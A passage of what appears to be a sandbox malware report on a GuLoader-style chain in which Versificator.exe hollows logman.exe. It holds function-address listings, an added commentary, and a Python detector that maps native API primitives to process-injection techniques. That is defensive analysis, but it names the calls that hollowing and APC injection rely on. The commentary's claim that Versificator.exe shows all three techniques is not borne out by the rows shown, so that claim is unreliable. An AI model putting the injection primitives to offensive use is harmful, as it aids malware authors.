            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272C60 NtCreateKey
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272CA0 NtQueryInformationToken
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272CF0 NtOpenProcess
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272CC0 NtQueryVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272F30 NtCreateSection
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272F60 NtCreateProcessEx
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272FA0 NtQuerySection
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272FB0 NtResumeThread
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272F90 NtProtectVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272FE0 NtCreateFile
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272E30 NtWriteVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272EA0 NtAdjustPrivilegesToken
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272E80 NtReadVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21272EE0 NtQueueApcThread
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21273010 NtOpenDirectoryObject
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21273090 NtSetValueKey
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03114340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03114650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031135C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031139B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03112CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03113010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03113090 NtSetValueKey
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03113D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03113D70 NtOpenThread
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_02769730 NtReadFile
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_027695D0 NtCreateFile
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_02769A10 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_027698C0 NtClose
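The Nt* rows above are worth reading as a set rather than one by one. Each stage carries its own stubs for the native API at a private address (a benign program reaches NtWriteVirtualMemory and friends through ntdll's exports, not through code of its own), and the stubs sit at the same low offsets in Versificator.exe (0x2127xxxx) and in logman.exe (0x0311xxxx), which is consistent with one payload image being mapped into the hollowed host. Taken together, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread are the primitives hollowing cannot do without, and NtQueueApcThread next to them is what an early-bird injection needs. The Python below is an added example, not Joe Sandbox code or its rule logic: it parses Code function rows as the report exports them (glued cell boundary and trailing duplicate id included), groups the Nt* primitives per process and names the technique the set is sufficient for. The technique-to-primitive mapping and the stub-count threshold are the example's own assumptions; the sample rows are copied from this report.

```python
"""Added example: group the Nt* primitives of each sandboxed process and name
the injection technique they are sufficient for. Not Joe Sandbox code."""
import re
from collections import defaultdict

# One "Code function" row of the report. The exporter glues the row's own id
# back onto the end ("...,15_2_03112E30"); that token is dropped in parse().
ROW = re.compile(
    r"Source:\s*(?P<image>.*?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8})(?P<rest>.*)$"
)
FUNC_ID = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")

# Assumption: the minimal native primitives each technique cannot do without.
# This is the example's own mapping, not the sandbox's rule logic.
TECHNIQUES = {
    "process hollowing (T1055.012)": {
        "NtUnmapViewOfSection", "NtWriteVirtualMemory",
        "NtSetContextThread", "NtResumeThread",
    },
    "early bird APC injection (T1055.004)": {
        "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
        "NtQueueApcThread", "NtResumeThread",
    },
    "section mapping injection (T1055)": {
        "NtCreateSection", "NtMapViewOfSection", "NtWriteVirtualMemory",
    },
}
# A benign program imports Nt* from ntdll instead of carrying its own stubs at
# a private address. The threshold is an assumption; baseline it on clean runs.
OWN_STUB_THRESHOLD = 8


def parse(lines):
    """Return {(pid, image): {api_name: [stub_addr, ...]}} from report rows."""
    procs = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = ROW.search(line)
        if not m:
            continue
        apis = procs[(int(m["pid"]), m["image"])]
        for tok in re.split(r"[,\s]+", m["rest"].strip()):
            if tok and not FUNC_ID.match(tok):
                apis[tok].append(m["addr"].upper())
    return procs


def analyze(lines):
    """Map each process to the techniques its Nt* primitive set is sufficient for."""
    report = {}
    for key, apis in parse(lines).items():
        present = set(apis)
        nt_stubs = {a for a in present if a.startswith("Nt")}
        hits = [name for name, need in TECHNIQUES.items() if need <= present]
        if len(nt_stubs) >= OWN_STUB_THRESHOLD:
            hits.append("own Nt* stubs (%d): likely direct/indirect syscalls"
                        % len(nt_stubs))
        report[key] = {"nt_apis": sorted(nt_stubs), "techniques": hits}
    return report


# Rows copied verbatim from this report's export (logman.exe, pid 15, and
# textless.exe, pid 0), including the glued cell boundary and trailing id.
SAMPLE = [
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03114340 NtSetContextThread,LdrInitializeThunk,15_2_03114340",
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_03112BF0",
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112F30 NtCreateSection,LdrInitializeThunk,15_2_03112F30",
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112FB0 NtResumeThread,LdrInitializeThunk,15_2_03112FB0",
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112EE0 NtQueueApcThread,LdrInitializeThunk,15_2_03112EE0",
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112D10 NtMapViewOfSection,LdrInitializeThunk,15_2_03112D10",
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_03112D30",
    r"Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112E30 NtWriteVirtualMemory,15_2_03112E30",
    r"Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_004049F90_2_004049F9",
]

if __name__ == "__main__":
    for (pid, image), r in sorted(analyze(SAMPLE).items()):
        print(pid, image, r["techniques"] or ["no injection primitives"])
```

Run it over the full report (one row per line) rather than the nine sample rows and the Versificator.exe stage (pid 11) lights up the same three techniques as logman.exe, which is the chain the analysis describes: GuLoader stage hollowing a Windows binary and handing the payload an APC. The mapping only says a process has the primitives for a technique, not that it used them in that order; pair it with the sandbox's behaviour log before calling it.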
            Source: C:\Users\user\Desktop\textless.exe | Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\textless.exe | Code function: 0_2_004049F9
            Source: C:\Users\user\Desktop\textless.exe | Code function: 0_2_004064AE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21230100
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212DA118
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212C8158
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212F41A2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_213001AA
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212F81CC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FA352
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_213003E6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212C02C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21300591
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212E4420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212F2446
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212EE4F6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21264750
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2123C7C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2125C6E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21256962
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2130A9A6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2124A840
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21242840
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212268B8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2126E8F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FAB40
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212F6BD7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2124AD00
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212DCD1F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21258DBF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2123ADE0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21240C00
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212E0CB5
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21230CF2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21282F28
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21260F30
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212E2F30
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212B4F40
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212BEFA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2124CFE0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21232FC8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FEE26
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21240E59
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21252E90
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FCE93
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FEEDB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2127516C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2122F172
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2130B16B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2124B1B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212F70E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FF0E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212EF0CC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212470C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212F132D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2122D34C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2128739A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212452A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212E12ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_2125B2C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212F7571
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212DD5B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FF43F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21231460
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_212FF7B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe | Code function: 11_2_21285630
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048D3D94
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CB544
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CD564
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CB688
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CB694
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048EC184
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048D5BA4
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CD33B
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048CD344
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319A352
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031A03E6
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030EE3F0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03180274
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031602C0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030D0100
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0317A118
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03168158
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031A01AA
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031981CC
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03104750
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E0770
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030DC7C0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030FC6E0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E0535
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031A0591
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03192446
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0318E4F6
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319AB40
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03196BD7
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030DEA80
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030F6962
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E29A0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031AA9A6
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E2840
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030EA840
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030C68B8
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0310E8F0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03100F30
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03122F28
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03154F40
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0315EFA0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030D2FC8
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030ECFE0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319EE26
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E0E59
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319CE93
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030F2E90
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319EEDB
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030EAD00
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030F8DBF
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030DADE0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E0C00
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03180CB5
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030D0CF2
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319132D
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030CD34C
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0312739A
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E52A0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030FB2C0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031812ED
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031AB16B
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0311516C
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030CF172
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030EB1B0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E70C0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0318F0CC
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031970E9
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319F0E0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319F7B0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_031916CC
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03197571
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0317D5B0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319F43F
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030D1460
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319FB76
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030FFB80
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03155BF0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0311DBF9
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319FA49
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03197A46
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03153A6C
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03125AA0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0317DAAC
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0318DAC6
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E9950
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030FB950
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0314D800
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E38E0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319FF09
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E1F92
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319FFB1
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030A3FD2
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030A3FD5
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E9EB0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03191D5A
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030E3D40
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03197D73
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030FFDC0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_03159C32
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0319FCF2
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_02752220
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274D2B0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274B290
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274B3E0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274B3D4
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274D090
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274D087
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_02753AE0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_027558F0
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0276BED0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll 3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 212AEA12 appears 67 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 2122B970 appears 175 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 212BF290 appears 94 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 21275130 appears 44 times
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: String function: 21287E54 appears 77 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 0315F290 appears 105 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 030CB970 appears 272 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 0314EA12 appears 86 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 03115130 appears 36 times
            Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 03127E54 appears 98 times
            Source: textless.exe, 00000000.00000000.876822237.0000000000433000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameimmensest autoecic.exe6 vs textless.exe
            Source: textless.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/25@2/3
